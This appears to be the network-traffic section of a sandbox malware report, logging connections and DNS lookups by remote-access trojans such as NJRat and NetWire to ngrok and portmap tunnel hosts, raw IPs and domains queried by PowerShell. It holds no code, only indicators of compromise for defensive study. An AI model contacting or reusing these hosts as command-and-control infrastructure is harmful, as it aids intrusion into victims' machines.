POST https://roaming.officeapps.live.com/rs/RoamingSoapService.svc

HTTP Response

200
193.161.193.99:22603

Server.exe

260 B
200 B
5
5
3.12.245.36:19521

0.tcp.ngrok.io

RegSvcs.exe

260 B
160 B
5
4
50.2.99.243:443

womenempowermentpakistan.com

powershell.exe

260 B
5
168.61.222.215:5400

MSBuild.exe

260 B
5
193.161.193.99:22603

Server.exe

260 B
200 B
5
5
193.161.193.99:22603

Server.exe

260 B
200 B
5
5
3.12.245.36:19521

0.tcp.ngrok.io

RegSvcs.exe

156 B
120 B
3
3
193.161.193.99:22603

Server.exe

260 B
200 B
5
5
3.137.60.53:19521

0.tcp.ngrok.io

RegSvcs.exe

260 B
200 B
5
5
193.161.193.99:22603

Server.exe

260 B
200 B
5
5
193.161.193.99:22603

Server.exe

260 B
200 B
5
5
193.161.193.99:22603

Server.exe

260 B
200 B
5
5
3.137.60.53:19521

0.tcp.ngrok.io

RegSvcs.exe

260 B
200 B
5
5
193.161.193.99:22603

Server.exe

260 B
200 B
5
5
193.161.193.99:22603

Server.exe

260 B
200 B
5
5
3.137.60.53:19521

0.tcp.ngrok.io

RegSvcs.exe

260 B
160 B
5
4
193.161.193.99:22603

Server.exe

260 B
160 B
5
4
34.132.102.6:443

atnimanvilla.com

tls

powershell.exe

455 B
958 B
4
3
195.35.22.167:443

deepikarai.com

tls

powershell.exe

806 B
5.3kB
8
9
3.137.60.53:19521

0.tcp.ngrok.io

RegSvcs.exe

260 B
160 B
5
4
185.136.161.124:8761

dlrarhsiva.exe

260 B
5
168.61.222.215:5400

MSBuild.exe

260 B
5
193.161.193.99:22603

Server.exe

260 B
200 B
5
5
3.137.60.53:19521

0.tcp.ngrok.io

RegSvcs.exe

260 B
160 B
5
4
193.161.193.99:22603

Server.exe

260 B
200 B
5
5
51.140.242.104:443

https://nav.smartscreen.microsoft.com/api/browser/edge/navigate/2

tls, http

msedge.exe

5.5kB
8.6kB
17
13

HTTP Request

POST https://nav.smartscreen.microsoft.com/api/browser/edge/actions

HTTP Response

200

HTTP Request

POST https://nav.smartscreen.microsoft.com/api/browser/edge/navigate/2

HTTP Response

200
193.161.193.99:22603

Server.exe

260 B
200 B
5
5
3.135.250.11:19521

0.tcp.ngrok.io

RegSvcs.exe

260 B
200 B
5
5
193.161.193.99:22603

Server.exe

260 B
200 B
5
5
66.33.60.130:80

http://www.towns.com/dorms/tom/bblboy.htm

http

msedge.exe

925 B
816 B
10
15

HTTP Request

GET http://www.towns.com/dorms/tom/bblboy.htm

HTTP Response

308
66.33.60.130:80

www.towns.com

msedge.exe

190 B
92 B
4
2
66.33.60.130:443

https://www.towns.com/favicon.png

tls, http2

msedge.exe

7.2kB
240.1kB
109
194

HTTP Request

GET https://www.towns.com/dorms/tom/bblboy.htm

HTTP Response

103

HTTP Response

404

HTTP Request

GET https://www.towns.com/_next/static/media/b0063d457f186698-s.p.woff2

HTTP Request

GET https://www.towns.com/_next/static/media/d6ff895bb8f0bde6-s.p.woff2

HTTP Request

GET https://www.towns.com/_next/static/chunks/webpack-622281acff5cf72f.js?dpl=dpl_9esqP8EFjRkR4Jy1qadLKHGssxq7

HTTP Request

GET https://www.towns.com/_next/static/css/ca31ac3167de7da4.css?dpl=dpl_9esqP8EFjRkR4Jy1qadLKHGssxq7

HTTP Request

GET https://www.towns.com/_next/static/css/e83a26a56fe23abc.css?dpl=dpl_9esqP8EFjRkR4Jy1qadLKHGssxq7

HTTP Request

GET https://www.towns.com/_next/static/chunks/4bd1b696-2531fe6b72bfb0f4.js?dpl=dpl_9esqP8EFjRkR4Jy1qadLKHGssxq7

HTTP Request

GET https://www.towns.com/_next/static/chunks/1517-a2579655d5db4165.js?dpl=dpl_9esqP8EFjRkR4Jy1qadLKHGssxq7

HTTP Request

GET https://www.towns.com/_next/static/chunks/main-app-9a3720905815865a.js?dpl=dpl_9esqP8EFjRkR4Jy1qadLKHGssxq7

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://www.towns.com/favicon.png

HTTP Response

200
193.161.193.99:22603

Server.exe

260 B
200 B
5
5
193.161.193.99:22603

Server.exe

260 B
160 B
5
4
3.135.250.11:19521

0.tcp.ngrok.io

RegSvcs.exe

260 B
200 B
5
5
193.161.193.99:22603

Server.exe

260 B
200 B
5
5
3.135.250.11:19521

0.tcp.ngrok.io

RegSvcs.exe

260 B
200 B
5
5
193.161.193.99:22603

Server.exe

260 B
200 B
5
5
193.161.193.99:22603

Server.exe

260 B
200 B
5
5
193.161.193.99:22603

Server.exe

260 B
200 B
5
5
3.135.250.11:19521

0.tcp.ngrok.io

RegSvcs.exe

260 B
200 B
5
5
168.61.222.215:5400

MSBuild.exe

260 B
5
193.161.193.99:22603

Server.exe

260 B
200 B
5
5
193.161.193.99:22603

Server.exe

260 B
160 B
5
4
3.135.250.11:19521

0.tcp.ngrok.io

RegSvcs.exe

260 B
200 B
5
5
193.161.193.99:22603

Server.exe

260 B
200 B
5
5
193.161.193.99:22603

Server.exe

260 B
200 B
5
5
3.135.250.11:19521

0.tcp.ngrok.io

RegSvcs.exe

260 B
200 B
5
5
193.161.193.99:22603

Server.exe

260 B
200 B
5
5
185.136.161.124:11614

dlrarhsiva.exe

260 B
5
193.161.193.99:22603

Server.exe

260 B
200 B
5
5
3.135.250.11:19521

0.tcp.ngrok.io

RegSvcs.exe

260 B
200 B
5
5
193.161.193.99:22603

Server.exe

260 B
200 B
5
5
193.161.193.99:22603

Server.exe

260 B
200 B
5
5
193.161.193.99:22603

Server.exe

260 B
200 B
5
5
3.135.250.11:19521

0.tcp.ngrok.io

RegSvcs.exe

260 B
200 B
5
5
193.161.193.99:22603

Server.exe

260 B
200 B
5
5
193.161.193.99:22603

Server.exe

260 B
200 B
5
5
3.135.250.11:19521

0.tcp.ngrok.io

RegSvcs.exe

260 B
160 B
5
4
193.161.193.99:22603

Server.exe

260 B
120 B
5
3
168.61.222.215:5400

MSBuild.exe

260 B
5
3.135.250.11:19521

0.tcp.ngrok.io

RegSvcs.exe

260 B
120 B
5
3
193.161.193.99:22603

Server.exe

260 B
200 B
5
5
193.161.193.99:22603

Server.exe

260 B
200 B
5
5
193.161.193.99:22603

Server.exe

260 B
200 B
5
5
193.161.193.99:22603

Server.exe

260 B
200 B
5
5
193.161.193.99:22603

Server.exe

260 B
120 B
5
3
3.137.60.53:19521

0.tcp.ngrok.io

RegSvcs.exe

260 B
160 B
5
4
185.136.161.124:15822

dlrarhsiva.exe

260 B
5
168.61.222.215:5400

MSBuild.exe

260 B
5
3.137.60.53:19521

0.tcp.ngrok.io

RegSvcs.exe

260 B
120 B
5
3
193.161.193.99:22603

Server.exe

260 B
160 B
5
4
3.137.60.53:19521

0.tcp.ngrok.io

RegSvcs.exe

260 B
160 B
5
4
193.161.193.99:22603

Server.exe

260 B
160 B
5
4
3.137.60.53:19521

0.tcp.ngrok.io

RegSvcs.exe

260 B
200 B
5
5
193.161.193.99:22603

Server.exe

260 B
120 B
5
3
168.61.222.215:5400

MSBuild.exe

260 B
5
3.137.60.53:19521

0.tcp.ngrok.io

RegSvcs.exe

260 B
160 B
5
4
185.136.161.124:17443

dlrarhsiva.exe

260 B
5
193.161.193.99:22603

Server.exe

260 B
160 B
5
4
193.161.193.99:22603

Server.exe

260 B
200 B
5
5
3.137.60.53:19521

0.tcp.ngrok.io

RegSvcs.exe

260 B
120 B
5
3
193.161.193.99:22603

Server.exe

260 B
160 B
5
4
193.161.193.99:22603

Server.exe

260 B
120 B
5
3
3.137.60.53:19521

0.tcp.ngrok.io

RegSvcs.exe

260 B
160 B
5
4
168.61.222.215:5400

MSBuild.exe

260 B
5
3.137.60.53:19521

0.tcp.ngrok.io

RegSvcs.exe

260 B
160 B
5
4
18.190.63.84:19521

0.tcp.ngrok.io

RegSvcs.exe

260 B
160 B
5
4
193.161.193.99:22603

Server.exe

260 B
160 B
5
4
193.161.193.99:22603

Server.exe

260 B
200 B
5
5
193.161.193.99:22603

Server.exe

260 B
200 B
5
5
18.190.63.84:19521

0.tcp.ngrok.io

RegSvcs.exe

260 B
200 B
5
5
185.136.161.124:8761

dlrarhsiva.exe

260 B
5
193.161.193.99:22603

Server.exe

260 B
200 B
5
5
193.161.193.99:22603

Server.exe

260 B
160 B
5
4
18.190.63.84:19521

0.tcp.ngrok.io

RegSvcs.exe

260 B
200 B
5
5
168.61.222.215:5400

MSBuild.exe

260 B
5
193.161.193.99:22603

Server.exe

260 B
200 B
5
5
193.161.193.99:22603

Server.exe

260 B
200 B
5
5
18.190.63.84:19521

0.tcp.ngrok.io

RegSvcs.exe

260 B
160 B
5
4
193.161.193.99:22603

Server.exe

260 B
200 B
5
5
92.122.54.81:443

https://metadata.templates.cdn.office.net/client/templates/gallery?lcid=1033&syslcid=1033&uilcid=1033&app=0&ver=16&tl=2&build=16.0.12527&gtype=0%2C1%2C2%2C5%2C

tls, http

WINWORD.EXE

1.2kB
5.9kB
8
9

HTTP Request

GET https://metadata.templates.cdn.office.net/client/templates/gallery?lcid=1033&syslcid=1033&uilcid=1033&app=0&ver=16&tl=2&build=16.0.12527&gtype=0%2C1%2C2%2C5%2C

HTTP Response

200
2.19.252.136:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851219.cab

tls, http

WINWORD.EXE

1.7kB
37.6kB
20
32

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851219.cab

HTTP Response

200
2.19.252.136:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851216.cab

tls, http

WINWORD.EXE

2.2kB
41.0kB
30
35

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851216.cab

HTTP Response

200
2.19.252.136:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp02835233.cab

tls, http

WINWORD.EXE

2.1kB
52.9kB
29
43

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02835233.cab

HTTP Response

200
2.19.252.136:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851217.cab

tls, http

WINWORD.EXE

1.7kB
39.7kB
21
34

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851217.cab

HTTP Response

200
2.19.252.136:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851218.cab

tls, http

WINWORD.EXE

2.2kB
37.8kB
29
32

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851218.cab

HTTP Response

200
2.19.252.136:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851220.cab

tls, http

WINWORD.EXE

2.2kB
37.5kB
29
32

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851220.cab

HTTP Response

200
2.19.252.136:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851221.cab

tls, http

WINWORD.EXE

1.7kB
38.5kB
20
33

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851221.cab

HTTP Response

200
2.19.252.136:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851222.cab

tls, http

WINWORD.EXE

2.0kB
34.8kB
25
30

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851222.cab

HTTP Response

200
2.19.252.136:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851223.cab

tls, http

WINWORD.EXE

1.9kB
40.3kB
23
33

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851223.cab

HTTP Response

200
2.19.252.136:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851225.cab

tls, http

WINWORD.EXE

2.1kB
37.0kB
27
31

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851225.cab

HTTP Response

200
2.19.252.136:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851226.cab

tls, http

WINWORD.EXE

2.5kB
41.7kB
35
35

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851226.cab

HTTP Response

200
2.19.252.136:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851224.cab

tls, http

WINWORD.EXE

1.6kB
36.9kB
19
31

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851224.cab

HTTP Response

200
2.19.252.136:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851227.cab

tls, http

WINWORD.EXE

1.6kB
37.4kB
19
31

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851227.cab

HTTP Response

200
193.161.193.99:22603

Server.exe

260 B
200 B
5
5
193.161.193.99:22603

Server.exe

260 B
160 B
5
4
193.161.193.99:22603

Server.exe

260 B
200 B
5
5
18.190.63.84:19521

0.tcp.ngrok.io

RegSvcs.exe

260 B
160 B
5
4
193.161.193.99:22603

Server.exe

260 B
200 B
5
5
193.161.193.99:22603

Server.exe

260 B
120 B
5
3
23.218.72.229:443

cxcs.microsoft.net

tls

1.5kB
7.5kB
20
16
95.101.143.201:443

www.bing.com

tls

2.0kB
7.4kB
21
17
168.61.222.215:5400

MSBuild.exe

260 B
5
18.190.63.84:19521

0.tcp.ngrok.io

RegSvcs.exe

260 B
200 B
5
5
185.136.161.124:11614

dlrarhsiva.exe

260 B
5
193.161.193.99:22603

Server.exe

260 B
160 B
5
4
18.190.63.84:19521

0.tcp.ngrok.io

RegSvcs.exe

260 B
80 B
5
2
193.161.193.99:22603

Server.exe

260 B
160 B
5
4
193.161.193.99:22603

Server.exe

260 B
120 B
5
3
168.61.222.215:5400

MSBuild.exe

260 B
5
3.12.57.198:19521

0.tcp.ngrok.io

RegSvcs.exe

260 B
40 B
5
1
193.161.193.99:22603

Server.exe

260 B
120 B
5
3
185.136.161.124:15822

dlrarhsiva.exe

260 B
5
193.161.193.99:22603

Server.exe

260 B
200 B
5
5
193.161.193.99:22603

260 B
200 B
5
5
3.12.57.198:19521

0.tcp.ngrok.io

260 B
200 B
5
5
193.161.193.99:22603

260 B
200 B
5
5
193.161.193.99:22603

260 B
200 B
5
5
3.12.57.198:19521

0.tcp.ngrok.io

260 B
200 B
5
5
193.161.193.99:22603

260 B
200 B
5
5
168.61.222.215:5400

260 B
5
193.161.193.99:22603

260 B
200 B
5
5
193.161.193.99:22603

260 B
200 B
5
5
3.12.57.198:19521

0.tcp.ngrok.io

260 B
200 B
5
5
3.12.57.198:19521

0.tcp.ngrok.io

52 B
40 B
1
1
193.161.193.99:22603

260 B
200 B
5
5
193.161.193.99:22603

260 B
200 B
5
5
3.12.57.198:19521

0.tcp.ngrok.io

260 B
200 B
5
5
193.161.193.99:22603

260 B
200 B
5
5
193.161.193.99:22603

260 B
200 B
5
5
3.12.57.198:19521

0.tcp.ngrok.io

260 B
200 B
5
5
193.161.193.99:22603

260 B
160 B
5
4
3.12.57.198:19521

0.tcp.ngrok.io

260 B
200 B
5
5
193.161.193.99:22603

260 B
200 B
5
5
193.161.193.99:22603

260 B
200 B
5
5
3.12.57.198:19521

0.tcp.ngrok.io

260 B
200 B
5
5
168.61.222.215:5400

260 B
5
193.161.193.99:22603

260 B
200 B
5
5
185.136.161.124:17443

260 B
5
193.161.193.99:22603

260 B
200 B
5
5
3.12.57.198:19521

0.tcp.ngrok.io

260 B
200 B
5
5
193.161.193.99:22603

260 B
160 B
5
4
3.135.250.11:19521

0.tcp.ngrok.io

260 B
200 B
5
5
193.161.193.99:22603

260 B
200 B
5
5
3.135.250.11:19521

0.tcp.ngrok.io

260 B
160 B
5
4
51.140.244.186:443

nav.smartscreen.microsoft.com

tls

3.0kB
7.4kB
13
11
51.140.244.186:443

nav.smartscreen.microsoft.com

tls

3.5kB
8.0kB
13
11
193.161.193.99:22603

260 B
200 B
5
5
193.161.193.99:22603

260 B
200 B
5
5
193.161.193.99:22603

260 B
200 B
5
5
193.161.193.99:22603

260 B
160 B
5
4
3.135.250.11:19521

0.tcp.ngrok.io

260 B
200 B
5
5
168.61.222.215:5400

260 B
5
3.135.250.11:19521

0.tcp.ngrok.io

260 B
200 B
5
5
193.161.193.99:22603

260 B
200 B
5
5
193.161.193.99:22603

260 B
200 B
5
5
193.161.193.99:22603

260 B
200 B
5
5
3.135.250.11:19521

0.tcp.ngrok.io

260 B
200 B
5
5
193.161.193.99:22603

260 B
200 B
5
5
193.161.193.99:22603

260 B
160 B
5
4
185.136.161.124:8761

260 B
5
3.135.250.11:19521

0.tcp.ngrok.io

260 B
120 B
5
3
193.161.193.99:22603

260 B
200 B
5
5
193.161.193.99:22603

260 B
200 B
5
5
193.161.193.99:22603

260 B
200 B
5
5
193.161.193.99:22603

260 B
120 B
5
3
168.61.222.215:5400

260 B
5
3.135.250.11:19521

0.tcp.ngrok.io

260 B
200 B
5
5
193.161.193.99:22603

260 B
160 B
5
4
3.135.250.11:19521

0.tcp.ngrok.io

260 B
200 B
5
5
3.135.250.11:19521

0.tcp.ngrok.io

260 B
120 B
5
3
193.161.193.99:22603

260 B
160 B
5
4
185.136.161.124:11614

260 B
5
193.161.193.99:22603

260 B
200 B
5
5
168.61.222.215:5400

260 B
5
193.161.193.99:22603

260 B
200 B
5
5
3.135.250.11:19521

0.tcp.ngrok.io

260 B
160 B
5
4
193.161.193.99:22603

260 B
160 B
5
4
193.161.193.99:22603

260 B
160 B
5
4
3.135.250.11:19521

0.tcp.ngrok.io

260 B
160 B
5
4
193.161.193.99:22603

260 B
200 B
5
5
193.161.193.99:22603

260 B
200 B
5
5
193.161.193.99:22603

260 B
200 B
5
5
3.135.250.11:19521

0.tcp.ngrok.io

260 B
120 B
5
3
193.161.193.99:22603

260 B
200 B
5
5
193.161.193.99:22603

260 B
200 B
5
5
193.161.193.99:22603

260 B
200 B
5
5
193.161.193.99:22603

260 B
200 B
5
5
168.61.222.215:5400

260 B
5
193.161.193.99:22603

260 B
200 B
5
5
3.135.250.11:19521

0.tcp.ngrok.io

260 B
200 B
5
5
193.161.193.99:22603

260 B
200 B
5
5
193.161.193.99:22603

260 B
200 B
5
5
3.135.250.11:19521

0.tcp.ngrok.io

260 B
160 B
5
4
193.161.193.99:22603

260 B
200 B
5
5
185.136.161.124:15822

208 B
4
193.161.193.99:22603

260 B
200 B
5
5
193.161.193.99:22603

260 B
160 B
5
4
3.135.250.11:19521

0.tcp.ngrok.io

208 B
160 B
4
4
193.161.193.99:22603

260 B
200 B
5
5
34.149.97.1:443

firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net

52 B
1
34.149.97.1:443

firefox-api-proxy.cdn.mozilla.net

tls

1.3kB
4.1kB
8
8
193.161.193.99:22603

52 B
40 B
1
1

8.8.8.8:53

github.com

dns

msedge.exe

1.1kB
2.4kB
17
17

DNS Request

github.com

DNS Response

20.26.156.215

DNS Request

github.com

DNS Response

20.26.156.215

DNS Request

ocsp.digicert.com

DNS Response

104.78.173.167

DNS Request

nav.smartscreen.microsoft.com

DNS Response

51.11.108.188

DNS Request

215.156.26.20.in-addr.arpa

DNS Request

avatars.githubusercontent.com

DNS Response

185.199.111.133

185.199.109.133

185.199.110.133

185.199.108.133

DNS Request

203.197.79.204.in-addr.arpa

DNS Request

api.github.com

DNS Response

20.26.156.210

DNS Request

216.156.26.20.in-addr.arpa

DNS Request

github-cloud.s3.amazonaws.com

DNS Response

3.5.28.198

52.217.142.81

54.231.224.25

3.5.27.25

52.217.123.1

52.216.36.209

16.15.177.158

16.15.177.155

DNS Request

www.bing.com

DNS Response

88.221.135.33

95.101.143.219

88.221.135.42

95.101.143.201

DNS Request

33.135.221.88.in-addr.arpa

DNS Request

133.32.126.40.in-addr.arpa

DNS Request

131.72.42.20.in-addr.arpa

DNS Request

nickman12-46565.portmap.io

DNS Request

drive.google.com

DNS Request

drive.google.com

DNS Response

142.250.200.46

DNS Response

142.250.200.46
224.0.0.251:5353

945 B
15
8.8.8.8:53

drive.usercontent.google.com

dns

NetWire.exe

148 B
180 B
2
2

DNS Request

drive.usercontent.google.com

DNS Request

drive.usercontent.google.com

DNS Response

142.250.187.193

DNS Response

142.250.187.193
8.8.8.8:53

nickman12-46565.portmap.io

dns

Userdata.exe

144 B
330 B
2
2

DNS Request

nickman12-46565.portmap.io

DNS Request

nickman12-46565.portmap.io
8.8.8.8:53

startitit2-23969.portmap.host

dns

NJRat.exe

219 B
498 B
3
3

DNS Request

startitit2-23969.portmap.host

DNS Request

nickman12-46565.portmap.io

DNS Request

nickman12-46565.portmap.io
8.8.8.8:53

startitit2-23969.portmap.host

dns

NJRat.exe

150 B
336 B
2
2

DNS Request

startitit2-23969.portmap.host

DNS Request

startitit2-23969.portmap.host
8.8.8.8:53

nickman12-46565.portmap.io

dns

Userdata.exe

144 B
330 B
2
2

DNS Request

nickman12-46565.portmap.io

DNS Request

nickman12-46565.portmap.io
8.8.8.8:53

startitit2-23969.portmap.host

dns

NJRat.exe

150 B
336 B
2
2

DNS Request

startitit2-23969.portmap.host

DNS Request

startitit2-23969.portmap.host
8.8.8.8:53

nickman12-46565.portmap.io

dns

Userdata.exe

216 B
615 B
3
3

DNS Request

nickman12-46565.portmap.io

DNS Request

officeclient.microsoft.com

DNS Request

officeclient.microsoft.com

DNS Response

52.109.32.97

DNS Response

52.109.89.18
8.8.8.8:53

roaming.officeapps.live.com

dns

WINWORD.EXE

146 B
495 B
2
2

DNS Request

roaming.officeapps.live.com

DNS Request

roaming.officeapps.live.com

DNS Response

52.109.76.243

DNS Response

52.109.89.19
8.8.8.8:53

blockchainjoblist.com

dns

powershell.exe

134 B
134 B
2
2

DNS Request

blockchainjoblist.com

DNS Request

blockchainjoblist.com
8.8.8.8:53

womenempowermentpakistan.com

dns

powershell.exe

148 B
180 B
2
2

DNS Request

womenempowermentpakistan.com

DNS Request

womenempowermentpakistan.com

DNS Response

50.2.99.243

DNS Response

50.2.99.243
8.8.8.8:53

startitit2-23969.portmap.host

dns

NJRat.exe

150 B
168 B
2
1

DNS Request

startitit2-23969.portmap.host

DNS Request

startitit2-23969.portmap.host
8.8.8.8:53

nickman12-46565.portmap.io

dns

Userdata.exe

144 B
330 B
2
2

DNS Request

nickman12-46565.portmap.io

DNS Request

nickman12-46565.portmap.io
8.8.8.8:53

nickman12-46565.portmap.io

dns

Userdata.exe

192 B
317 B
3
3

DNS Request

nickman12-46565.portmap.io

DNS Request

0.tcp.ngrok.io

DNS Response

3.137.60.53

DNS Request

0.tcp.ngrok.io

DNS Response

3.135.250.11
8.8.8.8:53

nickman12-46565.portmap.io

dns

Userdata.exe

222 B
501 B
3
3

DNS Request

nickman12-46565.portmap.io

DNS Request

startitit2-23969.portmap.host

DNS Request

startitit2-23969.portmap.host
8.8.8.8:53

nickman12-46565.portmap.io

dns

Userdata.exe

271 B
521 B
4
4

DNS Request

nickman12-46565.portmap.io

DNS Request

startitit2-23969.portmap.host

DNS Request

atnimanvilla.com

DNS Request

atnimanvilla.com

DNS Response

34.132.102.6

34.136.111.81

DNS Response

34.136.111.81

34.132.102.6
8.8.8.8:53

yeuquynhnhai.com

dns

powershell.exe

182 B
287 B
3
3

DNS Request

yeuquynhnhai.com

DNS Request

deepikarai.com

DNS Request

deepikarai.com

DNS Response

195.35.22.167

DNS Response

195.35.22.167
8.8.8.8:53

nickman12-46565.portmap.io

dns

Userdata.exe

438 B
831 B
6
5

DNS Request

nickman12-46565.portmap.io

DNS Request

startitit2-23969.portmap.host

DNS Request

nickman12-46565.portmap.io

DNS Request

startitit2-23969.portmap.host

DNS Request

nickman12-46565.portmap.io

DNS Request

nickman12-46565.portmap.io
8.8.8.8:53

startitit2-23969.portmap.host

dns

NJRat.exe

513 B
1.2kB
7
7

DNS Request

startitit2-23969.portmap.host

DNS Request

nickman12-46565.portmap.io

DNS Request

startitit2-23969.portmap.host

DNS Request

nickman12-46565.portmap.io

DNS Request

startitit2-23969.portmap.host

DNS Request

nickman12-46565.portmap.io

DNS Request

nickman12-46565.portmap.io
8.8.8.8:53

startitit2-23969.portmap.host

dns

NJRat.exe

219 B
333 B
3
2

DNS Request

startitit2-23969.portmap.host

DNS Request

nickman12-46565.portmap.io

DNS Request

nickman12-46565.portmap.io
8.8.8.8:53

nickman12-46565.portmap.io

dns

Userdata.exe

369 B
834 B
5
5

DNS Request

nickman12-46565.portmap.io

DNS Request

startitit2-23969.portmap.host

DNS Request

nickman12-46565.portmap.io

DNS Request

startitit2-23969.portmap.host

DNS Request

startitit2-23969.portmap.host
8.8.8.8:53

nickman12-46565.portmap.io

dns

Userdata.exe

339 B
574 B
5
4

DNS Request

nickman12-46565.portmap.io

DNS Request

startitit2-23969.portmap.host

DNS Request

nickman12-46565.portmap.io

DNS Request

0.tcp.ngrok.io

DNS Request

0.tcp.ngrok.io

DNS Response

3.137.60.53
8.8.8.8:53

startitit2-23969.portmap.host

dns

NJRat.exe

219 B
333 B
3
2

DNS Request

startitit2-23969.portmap.host

DNS Request

nickman12-46565.portmap.io

DNS Request

nickman12-46565.portmap.io
8.8.8.8:53

tls

219 B
498 B
3
3
8.8.8.8:53

nickman12-46565.portmap.io

dns

Userdata.exe

298 B
695 B
4
4

DNS Request

nickman12-46565.portmap.io

DNS Request

self.events.data.microsoft.com

DNS Response

52.168.117.170

DNS Request

startitit2-23969.portmap.host

DNS Request

startitit2-23969.portmap.host
8.8.8.8:53

startitit2-23969.portmap.host

dns

NJRat.exe

150 B
336 B
2
2

DNS Request

startitit2-23969.portmap.host

DNS Request

startitit2-23969.portmap.host
8.8.8.8:53

nickman12-46565.portmap.io

dns

Userdata.exe

144 B
330 B
2
2

DNS Request

nickman12-46565.portmap.io

DNS Request

nickman12-46565.portmap.io
8.8.8.8:53

nickman12-46565.portmap.io

dns

Userdata.exe

363 B
498 B
5
3

DNS Request

nickman12-46565.portmap.io

DNS Request

startitit2-23969.portmap.host

DNS Request

nickman12-46565.portmap.io

DNS Request

nickman12-46565.portmap.io

DNS Request

nickman12-46565.portmap.io
8.8.8.8:53

startitit2-23969.portmap.host

dns

NJRat.exe

219 B
498 B
3
3

DNS Request

startitit2-23969.portmap.host

DNS Request

nickman12-46565.portmap.io

DNS Request

nickman12-46565.portmap.io
8.8.8.8:53

startitit2-23969.portmap.host

dns

NJRat.exe

219 B
333 B
3
2

DNS Request

startitit2-23969.portmap.host

DNS Request

nickman12-46565.portmap.io

DNS Request

nickman12-46565.portmap.io
8.8.8.8:53

startitit2-23969.portmap.host

dns

NJRat.exe

150 B
336 B
2
2

DNS Request

startitit2-23969.portmap.host

DNS Request

startitit2-23969.portmap.host
8.8.8.8:53

nickman12-46565.portmap.io

dns

Userdata.exe

282 B
577 B
4
4

DNS Request

nickman12-46565.portmap.io

DNS Request

0.tcp.ngrok.io

DNS Response

18.190.63.84

DNS Request

startitit2-23969.portmap.host

DNS Request

startitit2-23969.portmap.host
8.8.8.8:53

nickman12-46565.portmap.io

dns

Userdata.exe

144 B
330 B
2
2

DNS Request

nickman12-46565.portmap.io

DNS Request

nickman12-46565.portmap.io
8.8.8.8:53

nickman12-46565.portmap.io

dns

Userdata.exe

144 B
330 B
2
2

DNS Request

nickman12-46565.portmap.io

DNS Request

nickman12-46565.portmap.io
8.8.8.8:53

nickman12-46565.portmap.io

dns

Userdata.exe

144 B
330 B
2
2

DNS Request

nickman12-46565.portmap.io

DNS Request

nickman12-46565.portmap.io
8.8.8.8:53

startitit2-23969.portmap.host

dns

NJRat.exe

277 B
733 B
4
4

DNS Request

startitit2-23969.portmap.host

DNS Request

self.events.data.microsoft.com

DNS Response

52.182.143.209

DNS Request

ocsp.digicert.com

DNS Request

ocsp.digicert.com

DNS Response

104.78.173.167

DNS Response

104.78.173.167
8.8.8.8:53

startitit2-23969.portmap.host

dns

NJRat.exe

150 B
336 B
2
2

DNS Request

startitit2-23969.portmap.host

DNS Request

startitit2-23969.portmap.host
8.8.8.8:53

nickman12-46565.portmap.io

dns

Userdata.exe

144 B
330 B
2
2

DNS Request

nickman12-46565.portmap.io

DNS Request

nickman12-46565.portmap.io
8.8.8.8:53

startitit2-23969.portmap.host

dns

NJRat.exe

150 B
336 B
2
2

DNS Request

startitit2-23969.portmap.host

DNS Request

startitit2-23969.portmap.host
8.8.8.8:53

nickman12-46565.portmap.io

dns

Userdata.exe

144 B
330 B
2
2

DNS Request

nickman12-46565.portmap.io

DNS Request

nickman12-46565.portmap.io
8.8.8.8:53

nickman12-46565.portmap.io

dns

Userdata.exe

288 B
165 B
4
1

DNS Request

nickman12-46565.portmap.io

DNS Request

nickman12-46565.portmap.io

DNS Request

nickman12-46565.portmap.io

DNS Request

nickman12-46565.portmap.io
8.8.8.8:53

startitit2-23969.portmap.host

dns

NJRat.exe

300 B
168 B
4
1

DNS Request

startitit2-23969.portmap.host

DNS Request

startitit2-23969.portmap.host

DNS Request

startitit2-23969.portmap.host

DNS Request

startitit2-23969.portmap.host
8.8.8.8:53

cxcs.microsoft.net

dns

192 B
154 B
3
1

DNS Request

cxcs.microsoft.net

DNS Request

cxcs.microsoft.net

DNS Request

cxcs.microsoft.net

DNS Response

23.218.72.229
8.8.8.8:53

startitit2-23969.portmap.host

dns

NJRat.exe

150 B
168 B
2
1

DNS Request

startitit2-23969.portmap.host

DNS Request

startitit2-23969.portmap.host
8.8.8.8:53

nickman12-46565.portmap.io

dns

Userdata.exe

216 B
495 B
3
3

DNS Request

nickman12-46565.portmap.io

DNS Request

nickman12-46565.portmap.io

DNS Request

nickman12-46565.portmap.io
8.8.8.8:53

startitit2-23969.portmap.host

dns

NJRat.exe

150 B
336 B
2
2

DNS Request

startitit2-23969.portmap.host

DNS Request

startitit2-23969.portmap.host
8.8.8.8:53

nickman12-46565.portmap.io

dns

Userdata.exe

144 B
330 B
2
2

DNS Request

nickman12-46565.portmap.io

DNS Request

